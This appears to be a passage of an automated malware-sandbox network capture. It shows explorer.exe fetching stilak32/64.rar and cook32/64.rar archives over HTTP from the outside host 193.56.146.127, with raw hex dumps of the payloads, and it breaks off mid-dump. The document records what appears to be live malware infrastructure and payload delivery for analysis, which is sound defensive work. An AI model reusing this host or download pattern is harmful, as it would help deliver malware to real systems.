                                                        Data Raw: 9b a0 46 9f fb 74 7e 4c 02 9a 3e fd d9 71 c7 75 b7 c0 cf a4 f1 8f 69 7b ca 68 40 93 06 4e b2 61 6c 45 b6 60 ec c8 ae 61 ba a7 30 65 32 00 93 c4 61 b5 26 75 0f 9c 24 d6 6b 8d 49 83 bd 29 e5 c2 8e 84 e2 03 a7 53 8f 50 53 4e 60 d2 b0 83 79 b0 30 aa 56 2b de 37 b8 1e 29 a1 fe 12 f0 a4 8a b6 1c 50 54 8d e2 11 22 11 00 28 bf 5a 8e 88 5c f1 a5 ea 66 e4 d9 1d 25 32 3c 0d b9 88 74 8f 8e 4d dd 6f 8d 0c ff 3b fb ab 12 a8 aa 7b 3c 4a 84 d1 1c 81 c0 03 d3 5a f7 ca 0e 84 a2 cd bf 4b 4b 8a 9a a7 0b 3b 18 09 93 80 bd 2c 22 aa 10 18 d9 46 7f 3f 4a 98 a1 32 15 53 4d 52 37 e7 3d fc df 0b 99 86 dc 6e 28 45 31 41 af 5b f3 54 b8 c3 c4 0e de b4 8c 35 e7 ae 58 26 d9 51 48 2a a9 7c 38 bf 34 02 be a4 a2 60 c2 f2 a1 0b a5 b7 b8 45 00 65 8d 87 9e 0f 13 57 99 55 9c 6f 29 be 48 cb 2b 94 3e 15 dc a9 ca 66 19 e4 4b 96 5f 82 fb 25 15 6c e8 81 ba c7 c6 11 8f a6 22 f3 d3 46 8e 0a 4e a3 47 a3 43 c4 28 a9 04 8e 33 96 50 fc ff da 85 d8 1a 90 b6 c3 b6 70 00 35 37 e8 e0 9b 16 3a 8f 42 cc df f8 46 d9 65 92 fb a4 09 89 80 4b ed 32 53 0c fb 12 10 01 3c a7 65 18 1f 85 a3 3d 19 3b 35 60 ca 34 5d 34 52 31 52 97 a4 f7 e9 c8 a8 6d fd aa 00 d9 1a 03 b4 cf d3 6b 1d c9 a9 fb 98 be 9e ee 6e 98 aa dc 13 43 f5 f1 a4 c8 15 60 ac 89 bc 66 0e c3 5c 86 cf 87 08 78 b0 d7 93 ca a5 f3 d7 df 9f 82 0e 0c 47 f8 ba bb 22 96 1d 41 af ad 20 bb 3b f4 7c 43 d6 33 6b c5 a7 00 ad c7 e3 85 36 3d a9 cd ff 43 13 5d 1a 98 65 a5 39 a0 04 97 16 f2 aa 48 11 c3 92 11 ad e2 6c a1 be f1 26 93 a6 ac 32 e7 cb 42 6c f0 44 33 e2 1d 8e ae 3e b7 6c 0e 9d d6 61 ea 8a 3d 3b f9 10 d5 5e 6f e6 95 69 c6 71 9b d9 76 5a d7 a6 6d 73 3c 9c 16 98 fe 91 6c 22 21 a9 0d a3 b8 32 ec 0c e2 56 21 bd 0f b2 d9 7d 28 84 dc 5c 0a d0 73 cb ab bd 78 b6 e9 06 c7 a0 94 a6 59 4e d2 71 5b 21 08 5b 65 ac e4 58 76 1e 02 c8 9f 0d dd e0 90 25 a2 63 d5 df 0d 62 e9 e1 79 ab 4a 3b 73 dc 24 a2 34 4b 8e f7 84 e2 34 b7 48 aa f8 38 8e 40 82 ea 3e f7 65 c4 e9 55 1e 1c 09 eb 5f e8 d6 e0 be 03 c7 53 d9 7b 75 89 9d 91 ca e8 
cf 8b fc 0e a2 1d 8b 29 79 32 6b ce 7d 50 cd 11 62 8e 9f e2 49 17 42 32 80 05 48 f4 b4 02 6d 95 48 d1 8f cf 58 79 80 88 10 83 25 2d 9c d3 a5 62 18 d5 cb e7 f6 ab c9 05 71 9d 97 91 57 12 95 83 e4 1e 21 ce 98 59 64 61 16 0c bc 86 44 3f 1e 63 85 6a b9 bb dc da c8 93 85 f0 15 ac 87 e7 0f bb 30 62 68 64 d9 35 20 8f a7 46 82 e0 bf e8 92 a0 37 1b 44 4e 09 c2 70 7b 5d ca 65 06 92 d7 1f 02 40 68 d8 f9 ce fe 22 b9 52 d6 37 3d 79 f5 4c bd 14 0c 30 6c e6 2b 48 c0 26 30 b8 43 9d de c8 55 66 eb 9d 88 ce 14 7f 49 50 c5 3f 64 97 0f 7a 4f 48 80 11 af 12 1c 95 66 bf ed ec e1 bd 12 35 7c da 51 24 8f b3 9f f8 1f 9b c0 d9 50 46 63 0f d2 4e 5c 43 00 32 a9 65 5a c3 30 73 8d 98 fa ff 3a 7d c3 b4 d5 ea d1 45 9c 4b 6c 69 1c f6 b4 3a 55 5c 5c 0e de 2a c7 47 93 6d ec 2b 02 99 c6 7b 5d ce 41 e3 ee c9 91 46 6e d4 10 d2 83 3e f6 91 b5 c3 ce d1 b9 12 29 94 e4 5a 7d ac dd 03 fc 4e 8f 4c 65 3e b6 12 c0 2b 6d 73 2a f6 b1 df bd a5 1d 5a 13 b6 7f a5 ca e1 33 ca 6b a4 88 3e c4 2e dd b1 9f 2c 6b 18 5e de cf fe 3b 59 3c 35 5f cf 58 4b 80 b6 2b aa 8f fe 2c ed d8 3b 2e 42 bb af 6f c1
                                                        Data Ascii: Ft~L>qui{h@NalE`a0e2a&u$kI)SPSN`y0V+7)PT"(Z\f%2<tMo;{<JZKK;,"F?J2SMR7=n(E1A[T5X&QH*|84`EeWUo)H+>fK_%l"FNGC(3Pp57:BFeK2S<e=;5`4]4R1RmknC`f\xG"A ;|C3k6=C]e9Hl&2BlD3>la=;^oiqvZms<l"!2V!}(\sxYNq[![eXv%cbyJ;s$4K4H8@>eU_S{u)y2k}PbIB2HmHXy%-bqW!YdaD?cj0bhd5 F7DNp{]e@h"R7=yL0l+H&0CUfIP?dzOHf5|Q$PFcN\C2eZ0s:}EKli:U\\*Gm+{]AFn>)Z}NLe>+ms*Z3k>.,k^;Y<5_XK+,;.Bo


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        1 | 192.168.2.4 | 49823 | 193.56.146.127 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        May 4, 2022 16:21:18.561359882 CEST | 11244 | OUT | GET /stilak32.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:18.631387949 CEST | 11245 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:18 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 345746
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-54692"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 45 3c 14 4b d0 5d 55 6d d6 39 03 77 c9 7b 8d 6f 22 6a 6a 86 75 9f 21 88 39 51 b9 54 4f 5d 8b 01 83 84 88 c3 c4 e9 b8 f5 df 9b 8c f7 18 3e 22 a4 54 ec cd c8 8b 25 85 47 35 c2 03 d7 74 4b 62 07 1b bb 2d da 89 3a ff f7 f1 ad 45 c1 72 6b db 20 53 03 5c 8d 35 28 67 e8 c8 30 4d 21 98 3c 54 88 2e ff ed e8 2f f1 af fd 4d 6e 64 3a ff cd 30 06 70 c6 c3 c7 1c 6b 06 eb 14 2e fd fb 26 d0 4a 85 ee d4 63 44 d5 4e b6 98 b9 71 80 5c 45 f3 51 26 7a 06 4e 3e 71 04 31 10 c4 e7 9f 57 ea 5a 58 95 cc b9 a4 ff 59 f5 00 06 ee 0b ec 97 ae 6a e1 6b 4b 1e 7f 0c 3e ae 18 69 c7 1e 51 2b 48 08 72 9c 92 de 9e c7 bb 90 a4 47 92 f5 78 c0 ee 8a 9d 27 a5 b1 92 4b 5f e9 30 e2 11 ec 49 67 c8 06 45 e7 20 10 c6 8d 8c e4 90 8e 61 66 c6 55 d8 aa c6 cc e4 41 f1 71 48 ff bb 80 0c 36 7a 64 1e 9b 75 49 85 63 8f c6 f5 2f b3 0d 60 ee c9 58 13 13 e5 cf 75 4c 90 68 3d c8 15 4b 57 a0 28 a9 e8 a9 5a bd 58 d6 fe 11 ac 7c 5b 97 5f 52 79 45 34 d5 d3 90 9a aa 34 dc 39 d7 ed b3 46 50 5a b0 db 01 20 2d 9e 12 34 15 d3 32 cb 4f 90 5b 4a c5 1c 2e 3d 97 91 b1 38 c8 f5 a7 ed 28 5c 09 b0 d3 db e1 30 d5 56 b3 dc b8 f8 1a c4 b7 29 9f f7 59 ed db a5 af 64 5b 86 f4 36 fd 1a 08 a0 83 6e d4 9a 57 57 ac fc c8 38 2d 9a 03 f5 ad 54 d3 e4 da f7 15 09 6f 6b e8 90 58 1a 6f 4b 55 40 18 d7 03 0b e9 29 8e 2c 61 5f d8 55 a1 3a 89 4b 35 17 49 73 1a 92 67 db a8 b3 36 c3 ce 56 29 08 a7 e7 d3 0d 73 4d 10 39 70 43 43 1f 2b cf bb 4c 25 04 7d 1e e2 ea bc 8a 09 9e a8 93 81 ad 69 dc 56 16 25 1a ad fb ed ec 51 4a fc 77 0a 02 0a 90 bf 88 21 55 f2 2f 1c 99 b1 24 5d c8 ac 64 e0 01 60 38 b0 6d 26 b5 4d c7 6c 4a 2b ea 80 1f 22 5f 29 6a 4b 07 aa 05 53 a8 8f fa 9d c6 e8 57 b5 b4 4e e3 9b 52 fc 3e 81 2b 26 5f 9f e9 05 68 b4 d8 9c e2 56 7a 8e 00 54 d1 15 35 58 8e 90 a1 d7 eb 8f 46 6f cb c2 5a ca 30 06 30 cd 90 51 99 2d b5 bd 61 8f ec 60 0d 01 ed f2 75 d8 a4 f7 de ec 2d bd a9 2f 8e 12 cf 96 eb 6a f8 98 31 e0 f8 3e 0e 74 39 26 20 24 68 55 44 16 ff cc a6 23 59 97 0b a1 f1 b6 fb 89 f4 b5 da c0 7d 75 
20 3d d9 49 54 38 10 f6 f9 63 e4 05 36 ae d6 4c 8a 05 c2 fe 1e ac 06 9e db 75 32 37 07 e7 c3 b6 9c 5e 83 ca 53 0e da ee 81 d7 b5 5c a1 87 8f 9a ea d3 7f df f5 37 9b b3 46 27 1c ea 74 d5 a7 21 2a 00 91 e4 f6 c1 f1 39 78 e8 d4 20 ff a2 16 21 ef 38 d7 ef 6e eb b6 fd 7e 80 02 1b 35 d7 b6 9a d5 fe 28 df af 35 62 c9 a8 ce 24 c8 c9 34 fb f3 18 cf c2 52 99 d7 20 aa ee ae 1a 1d 48 34 ba f6 0b 9c bb 6e 6f d1 52 51 9f 3c 7a 40 80 b2 97 e7 a6 21 9b 3c a0 89 2b 0b ff 33 6c 1b cb ae 6b db 09 ea 36 86 d7 c1 c4 69 4a 06 9e 57 c1 72 a1 99 ee 89 16 9c d1 ec b2 ee e7 eb 55 ba 48 4a db 98 e8 cd c4 f5 79 f2 bc 0f 72 89 35 21 b2 31 c0 23 84 8c 5d 69 2e 9f 9b 35 4c ed 3e 88 30 80 23 d1 62 db 8d d7 e2 4f 59 ac d0 70 6e c1 ad 08 ba cd 5b f2 5f 8b 71 36 3e b2 47 87 82 4d 06 99 24 e0 f3 12 1f 12 72 de 4d b3 fc fc d2 56 45 00 15 5f a1 4b 31 f1 d2 df 66 89 a7 78 38 b6 1e c4 2b ae 0f d1 fd c2 70 dd b8 02 87 f1 d1 d4 38 b0 ba 8f 54 20 e9 3a 5e 76 41 0d 2c 2f c6 ea 2b d1 e2 c7 75 28 2b 67 9a fd e3 25 da f6 b2 85 38 17 f2 4f 56 eb 5d 6d 18 31 eb f2 a2 4e bb 02 dd 3f af 48 6c e1 55 9d e5 6f 84 4b 4f 52 78 7c 9f 22 c3 68 57 84 28 a1 b0 04 9c 61 e4 fb 3d 66 28 8a f4 72 d0 56 1d 93 cf 96 bc cb 90 b7 44 dd 0c 60 47 93 14 34 9b 81 13 d0 34 9e 64 ef 32 cc 1b bd fa 2b 54 f3 10 ce b9 5a e2 d6 7c 83 87 e2 39 b2 2a b5
                                                        Data Ascii: E<K]Um9w{o"jju!9QTO]>"T%G5tKb-:Erk S\5(g0M!<T./Mnd:0pk.&JcDNq\EQ&zN>q1WZXYjkK>iQ+HrGx'K_0IgE afUAqH6zduIc/`XuLh=KW(ZX|[_RyE449FPZ -42O[J.=8(\0V)Yd[6nWW8-TokXoKU@),a_U:K5Isg6V)sM9pCC+L%}iV%QJw!U/$]d`8m&MlJ+"_)jKSWNR>+&_hVzT5XFoZ00Q-a`u-/j1>t9& $hUD#Y}u =IT8c6Lu27^S\7F't!*9x !8n~5(5b$4R H4noRQ<z@!<+3lk6iJWrUHJyr5!1#]i.5L>0#bOYpn[_q6>GM$rMVE_K1fx8+p8T :^vA,/+u(+g%8OV]m1N?HlUoKORx|"hW(a=f(rVD`G44d2+TZ|9*
                                                        May 4, 2022 16:21:19.983093977 CEST | 11604 | OUT | GET /stilak64.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:20.052925110 CEST | 11605 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:20 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 482456
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-75c98"
                                                        Accept-Ranges: bytes
                                                        Data Raw: e5 fa 7e 78 18 d2 fa aa c5 af 39 73 64 ae 32 3f 58 b7 78 e0 83 5a 17 11 c3 94 46 e1 67 28 25 c0 56 b0 8e b3 89 83 f4 bc 22 0d e7 0a d8 e8 c8 63 a3 83 3e d6 30 50 e4 a9 9a 1b 71 35 a6 03 6a 66 77 c3 32 b3 17 1b 8d ce 57 f7 d8 a0 18 ad 5c 55 3a 1a ed 82 23 7a 05 16 38 0f f9 f0 29 40 9e e7 83 8c 88 c6 5e a3 a4 95 6f 47 22 95 d0 67 72 d9 9c 24 0c 6e b1 f0 3f 4b f6 52 44 2a 1a 76 be 5b 9a 2b d9 ca 42 6c f4 ed 16 d3 3f ec 46 20 1f 69 de 27 d7 c5 6f 3b 47 5a c3 0b 96 a9 98 fa 58 ac 6c ea b4 b7 36 35 3a 8a a0 f5 d3 98 52 5b 8a 13 4c 80 a3 20 19 f4 a7 de 96 80 a8 16 b7 6b a0 d4 7a 1e 01 0c b3 30 a8 e4 00 e6 75 7c b5 d4 20 a1 5a 63 a2 be f2 7d d2 dc ca 58 28 3a 1b 7d 0d 9c 18 5d 09 e7 cc 47 1e 58 36 56 04 ed a4 0f bd dc c9 36 52 13 2f 3f 87 85 99 c7 7c 30 43 a2 1d 68 ed 50 28 cf 39 bd 1f 09 c3 c3 f3 f8 17 7d da 0e 24 10 f7 48 90 cf e0 69 1a dd ad 3b 05 4e 60 77 b6 88 86 96 09 3e c2 8b 7c 16 15 cf ef 97 87 48 77 3e 4e d7 2d ab 99 1c 0b b9 6f 1f 42 43 bd f5 18 7f de 21 d9 e3 48 aa 53 db e7 b9 e3 6b 68 61 ba ce d1 57 81 b9 38 ae 7c 26 1a 75 2c 8b 75 f9 76 22 07 4d 54 8e 48 ba 50 e1 57 da 02 94 fc be 0e 32 1e 74 69 35 ac 2a 9f e9 3b 08 62 8c f8 5c d6 90 09 f9 2e 09 57 42 2b 16 09 58 22 a3 2c 6d 1f ea 3d 30 89 c0 b7 d1 ce de 73 7f 37 ed 0c 99 8b e2 32 40 d1 f5 56 19 ae 42 96 bb 30 d1 b6 c4 b2 41 a0 9a 04 6b 89 70 99 ae 4a 53 59 9b a0 72 c8 3d 5c 41 6b 23 51 da 55 d8 00 36 6c 5d 76 29 44 f8 6e 10 8c 09 d1 6c 57 fa 5e a8 ad 52 b3 1b d3 fd d9 20 c1 48 a8 77 fc 66 9c 4e 47 2f 03 1f e8 f8 7e d0 88 fb 00 4e 9d 7a 6c 5b 79 24 c5 6d 45 b7 e5 a9 3c 4e 21 ce 32 91 f0 37 af 1a 52 75 0e 9b 76 2a a4 bb 1b 73 62 8c 91 58 03 96 92 6c 0a 53 22 d9 a3 c3 b8 39 59 c3 05 b8 a3 ce 52 db 5b 8c e9 e6 89 b1 b9 fe 68 46 f4 42 9d 67 5a 0c af 7c a0 67 03 10 95 56 48 15 4d 4f 45 7c 22 d7 fd e4 5a d5 b3 c9 b7 6f 4c 11 28 0d 48 1b 59 81 4e 7a b9 75 55 c2 f2 4b a8 be b6 ce 92 44 78 3c 92 d2 e2 3e a3 10 fd e6 70 f3 90 d4 fd 68 bc 32 e5 f8 40 15 
6a e0 81 48 d5 12 fa 81 87 cd 26 00 fb cb 0a 40 dc 19 93 b6 ef 14 f4 cf 7b 7d d0 26 e4 22 f3 cb c8 2d 86 57 ea ce f4 11 17 86 21 84 63 78 4c 73 22 38 7f 7b 00 b7 1e eb 44 a5 dc c8 64 6b d5 30 33 88 fe d0 9a 80 4b c3 20 b4 ff 0a 93 21 aa 2b 3f b1 e0 6d c5 d1 e1 a3 de 9e 57 39 c6 ae a0 f2 7d bb b3 7e 9a 89 27 c1 61 3c 35 b0 05 a8 9e 3d ed 6b c6 bd 7f d0 49 31 11 41 03 7a 90 08 6d d5 4b ce 53 7c 99 f9 97 39 0c 4f aa ae af f8 d2 2b b7 4a 40 44 7b e7 73 7b 82 fc 96 63 4f eb e5 d1 b8 54 43 af 66 12 64 31 6e a7 09 3a da 76 64 85 31 79 7e 7a c2 ce 63 1a 49 44 0a b7 91 93 6a de a3 78 f6 7d fe 5c 80 da 20 c9 63 db 06 cd 1d 50 25 cc 5c 20 3a b9 8b f2 ff c4 15 fd a5 a0 e7 63 e8 80 ec 98 d8 e5 da 11 6e 51 12 60 1e 36 a9 a6 14 1b 31 11 fe d0 fa 9f d7 4c 96 b8 60 df 61 c3 ac 86 08 15 56 be fd 91 64 0d 01 2d 9f 21 1c ec ee 82 3f e8 20 93 ef bf d9 be 77 ef 6d 34 99 96 3f 1c 86 df 7e da 56 22 35 61 dc a9 f6 ab 19 dc 96 8b 72 37 d3 ea ec 15 cf b8 39 f9 59 80 31 05 4e 88 bc cb b3 7f f6 c1 ee 0c 33 c7 00 1d b7 1e c0 52 f5 b7 24 88 fc f0 8d 3d 88 e3 12 38 01 1a 66 9b 4b 15 cc 7b ce 47 68 7b 76 84 03 de 88 9a a7 13 a5 56 7c ff f9 52 bb 6b 8b 91 c6 15 c0 9b 0d b2 cf a5 2f 68 1e db 02 4e c0 d3 e7 a0 d9 54 d1 df 7e 96 03 1e 16 59 f6 57 3b 42 11 1c 7f 7e a3 3d 1d b8 08 a2 78 50 1a 3c 6c 97 17 a1 b5 47
                                                        Data Ascii: ~x9sd2?XxZFg(%V"c>0Pq5jfw2W\U:#z8)@^oG"gr$n?KRD*v[+Bl?F i'o;GZXl65:R[L kz0u| Zc}X(:}]GX6V6R/?|0ChP(9}$Hi;N`w>|Hw>N-oBC!HSkhaW8|&u,uv"MTHPW2ti5*;b\.WB+X",m=0s72@VB0AkpJSYr=\Ak#QU6l]v)DnlW^R HwfNG/~Nzl[y$mE<N!27Ruv*sbXlS"9YR[hFBgZ|gVHMOE|"ZoL(HYNzuUKDx<>ph2@jH&@{}&"-W!cxLs"8{Ddk03K !+?mW9}~'a<5=kI1AzmKS|9O+J@D{s{cOTCfd1n:vd1y~zcIDjx}\ cP%\ :cnQ`61L`aVd-!? wm4?~V"5ar79Y1N3R$=8fK{Gh{vV|Rk/hNT~YW;B~=xP<lG
                                                        May 4, 2022 16:21:20.986284018 CEST | 12097 | OUT | GET /cook32.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:21.056226969 CEST | 12098 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:21 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 340630
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-53296"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 6d 89 b6 ca 2a ed 42 3d 7d 47 d0 53 23 32 6f 53 6a 18 43 e5 c9 c2 0c 08 3c 98 eb e5 5a fa 10 6b 57 26 bc 9b f0 a5 12 7a 6c 04 9f 5a 67 bf da 73 38 dc 4f f9 57 6f 44 87 6a 61 4c 28 46 19 8a 17 c0 a1 29 d4 cb d9 7f df 5b 7c 63 f5 13 a1 14 71 6d 42 2e b2 f5 59 29 7c 87 a1 85 d4 1c 9b 3f ef a8 f6 e4 e5 fd 9c 77 6b 20 0a ef 83 e2 4b 0a 08 c3 2a d3 f8 29 c9 6f c3 69 e9 5d 3e 42 1c c2 51 2c b5 2a 1c 83 56 42 6e 66 c9 a9 37 88 6e c8 92 7c 71 34 5e d0 9a 79 dd f4 a2 c9 6c c3 09 ee fb a8 1b 7c 8a 32 22 e3 f7 3d 56 be e1 1b 69 76 c3 79 f0 46 77 7a a8 11 e3 c7 c0 53 1b 6b 6a 48 d1 85 31 39 dc fe 06 d6 e9 74 64 06 24 8a d0 8e 4b ff f4 e0 cf 12 83 f0 05 39 35 bb e3 f8 83 a9 dc bd ea da f6 e9 5f 80 4f 7a c4 55 e5 29 3e 8d d9 ac 0f 26 10 c0 c7 5f d6 e8 5f 6c 78 c7 e2 1e 1e d9 1c 3b bc 29 52 3c b6 c1 c3 b2 01 02 6a 02 c6 95 a6 72 ff df 84 59 a0 a0 db e2 e6 61 6b ba 2a 7d ee 05 0b 52 ad e3 1d 87 e3 c9 17 0a 40 aa f1 94 02 d5 33 eb d7 c3 f0 67 c4 1c 20 0d 95 ce 30 f5 d2 87 8d 40 8a ce 79 ed d6 bb 66 a3 f5 1c 4d 0a f7 5a 18 80 ed f6 bf 80 65 ba e9 43 dd 51 e1 b6 2c ca bd 55 f4 95 f9 92 ac 90 09 e9 f4 09 f5 39 a4 0e 4b f1 a5 83 6a 47 bb b6 4c 36 2a 21 5d e6 d8 72 78 53 fb d9 f7 f2 8d 9e 11 cb d0 8f 4a 21 bc 88 58 fe c1 f0 90 99 df 71 6b 54 3f f5 df d7 1f ad 34 ca c0 05 38 eb 6b 0e d7 a7 9b 5c dc d4 7e 5b 0a 34 fa a2 0e 99 8a e5 8d 14 fb d7 b1 7a 9e 07 60 aa 1b 77 b1 d0 f9 ab 5b f3 85 9c a1 4d be 42 b4 ae c2 71 be a8 9a 56 92 9d ea b6 58 bc 12 97 42 7b 22 d2 2c cf 6d a5 89 e2 82 96 94 dd 13 7b 7b 6d 9a c9 09 92 7d 64 83 ca 77 f7 cb 2f 1b b9 09 85 20 63 ca d9 45 9c 9c c7 0d 83 7b ff 7f ac 43 db 3f bd 63 b6 22 fd 6e 33 e3 6c 4b ae ad ae cc 87 37 65 d5 32 68 2e 23 95 b8 bc c8 86 48 48 3d 72 d7 a7 da 5d 2d 7f 47 a5 6a f6 ad a7 ff 84 58 75 92 9a 9d a4 dd d2 f5 ad df ad 48 fb bd 27 0e 25 49 5e 64 16 b6 0e 73 f9 e4 17 d2 5b 6d c8 22 d8 43 48 56 15 fb 9c 42 56 39 a3 70 64 c8 33 f6 e4 9f 56 0d ad ab 1d d6 13 6b 29 72 9a 9f 67 d1 
09 d8 8d a9 f1 da 83 11 71 c6 36 f6 0f fd 15 ea 7d c2 b9 7c 50 0a 64 57 df 84 23 16 33 a9 63 44 2c cd 9f 91 91 48 62 6f 01 de a9 79 f9 9f e5 da c2 2f 3d 3d 8d f3 15 90 5e 40 97 b7 89 80 7c e7 b8 25 3b e5 fd c3 59 b8 96 6f 1b f5 f1 a8 e7 93 9a f3 2e 1b 20 f5 81 30 04 e7 1f b1 c1 26 0a 66 9e 5a 26 8a 84 87 62 19 40 91 4b 09 f5 b6 6e dd 85 e3 0c c3 8d 5c 81 1c 75 ff cd 82 f6 f9 19 9b b7 89 84 7f 7e 93 48 e8 dd 3f 78 6e 56 16 76 fb 0c 99 76 d6 ab a5 59 c5 f8 69 60 1c 39 69 a2 30 2b 2d 13 2e 87 9f 15 80 a5 95 d0 d5 74 62 e0 7e 5b e2 31 9a 26 55 f7 26 85 94 f7 52 17 b5 b4 48 bd 3d d9 41 ae 57 4b fc d6 18 61 b6 bf 00 46 21 bf 78 9c bf 34 f9 82 ea 25 00 a1 1d f6 6c 13 14 e9 e7 c8 43 e0 34 cb 4c 95 b5 74 cc d4 24 c4 46 51 f5 86 70 d2 f9 54 8b 6d 76 cf f6 78 76 c0 f8 e8 bf dc 50 7a a6 3b e2 c8 5c 13 da bb fc d7 c4 a4 7d ec 16 79 f1 e7 b8 91 93 a6 8f e9 71 24 2d 4a 35 34 c5 60 83 1b 33 af 4f 95 07 b7 e8 27 92 89 62 82 70 1f ac da f6 38 c8 6f d7 2d da 85 e7 6b 98 21 b8 ba fe 3c ed a9 10 6f 75 e0 75 35 b9 41 a8 d5 98 c5 64 ff 05 c0 67 c2 99 d2 5d 5a 36 a2 8c 3f 4d 85 8c 88 c5 d3 2f 07 7d 8d 0e d5 35 3b 0a a3 ba e6 c9 f3 45 c3 d1 20 d1 d0 70 9c 38 4d 7d 5f 8d 5a 3c 5c be c4 8d 0b 94 a2 61 ec 32 78 8a 7d c2 ec d9 af 05 02 38 d6 ed f3 9c ee 02 c6 6a 90 1b 1a 76 57 73 d7 ed a5 1f ee 98 96 63
                                                        Data Ascii: m*B=}GS#2oSjC<ZkW&zlZgs8OWoDjaL(F)[|cqmB.Y)|?wk K*)oi]>BQ,*VBnf7n|q4^yl|2"=VivyFwzSkjH19td$K95_OzU)>&__lx;)R<jrYak*}R@3g 0@yfMZeCQ,U9KjGL6*!]rxSJ!XqkT?48k\~[4z`w[MBqVXB{",m{{m}dw/ cE{C?c"n3lK7e2h.#HH=r]-GjXuH'%I^ds[m"CHVBV9pd3Vk)rgq6}|PdW#3cD,Hboy/==^@|%;Yo. 0&fZ&b@Kn\u~H?xnVvvYi`9i0+-.tb~[1&U&RH=AWKaF!x4%lC4Lt$FQpTmvxvPz;\}yq$-J54`3O'bp8o-k!<ouu5Adg]Z6?M/}5;E p8M}_Z<\a2x}8jvWsc
                                                        May 4, 2022 16:21:21.354583979 CEST | 12447 | OUT | GET /cook64.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:21.424647093 CEST | 12448 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:21 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 476828
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-7469c"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 5d 8b 8b 70 09 0e 1d d9 90 dd ab 7b 33 6a c0 52 31 a0 b6 04 f6 3f 2c 2e c3 a2 b0 07 ab 38 fc 74 ed fa 59 e1 54 59 8e 5a d4 67 4d 48 cf 9f 04 d9 44 fe 6c 57 29 99 30 f7 01 d0 36 58 0f ca d2 73 70 1b f2 92 c3 7c b0 3e 78 94 57 f4 4b 39 77 05 b8 ed 02 5e 12 4d a6 e1 05 bd f8 f7 d0 d3 a9 57 55 34 57 87 40 e8 b9 6e f0 ed b3 db 4d d9 05 e2 95 5c 9f 02 48 e3 34 67 c4 9b c0 1d c1 c5 bb 24 97 c6 50 01 fa 49 39 fe 75 1f 0a cd 7a 85 7c 3e 16 e7 e0 9d 81 48 fc dd e7 f1 c9 40 7f d9 9b a3 0d 47 7e 92 cb bf b8 20 da cd 79 0a 4d 36 0d b3 c3 07 69 6d f6 b1 f7 16 08 4d 9d 4d 3f 64 80 88 78 d5 5e 87 99 18 f7 12 21 85 7b eb e6 e1 da 00 0b 9e 5a 71 f7 a8 d7 1a 90 73 9e f2 5c 58 fe c7 3b d3 50 e2 f5 6a 2c 9d 8e 92 29 e1 cd 48 ef 98 a1 fb b3 f8 a2 4e b0 b5 38 26 8d 53 db a2 fc ce 6d 68 10 e7 2f e5 f9 85 ed 30 21 92 ff 70 02 7e 81 35 20 c0 ef ca c1 26 c7 af 71 43 ee ae 83 a2 48 a2 80 67 06 47 4f cf 11 52 22 6c 92 7d d5 97 98 fc 3a 05 f7 bd 2a 25 56 2a 75 75 71 a8 d9 03 23 39 d2 9d e4 98 16 0c 8c db b9 7a 07 7c 0a 6d ff 9b 86 a2 66 05 12 59 42 0d 1c 4c 41 17 ef 22 93 8b 8f b4 16 ea a7 65 a2 f2 86 50 8e 7f 69 86 be 4c a4 a9 59 1c 9b f3 9f 0b 9c 10 6e b5 22 b7 ae 7b b1 fe 1c 95 d6 9c a1 09 44 dc 9c f4 f1 4c de 51 5d 68 07 c9 c4 5d ff 0c e1 b6 0c 22 f4 4b bd 4c 90 32 b0 ba 85 9f 26 76 c8 98 ea 24 ea 9b e4 b8 a6 7c bf a3 36 76 9d e4 10 f7 ba 31 a7 43 fa f1 62 26 3d 4c 8a 9a 05 4f 31 c1 45 8d 82 49 7e f1 5b aa 01 0e 36 1c 0b 54 ae 27 c3 5c cf eb d9 3d 13 11 c3 33 c7 63 79 1d aa 1c f7 d5 73 58 da 62 fd c5 2e e1 2f a0 4a f5 15 c6 7d 26 3d 43 80 c9 3c 2d 7f 2e df 94 f4 e4 95 7a e6 92 36 e2 eb 6c c6 08 80 4f 5c 8d 79 5f 59 ac b1 a8 ef 57 99 26 e7 a7 c0 52 18 16 02 ad 0c ca ef c6 74 5a f0 04 33 a3 ea 81 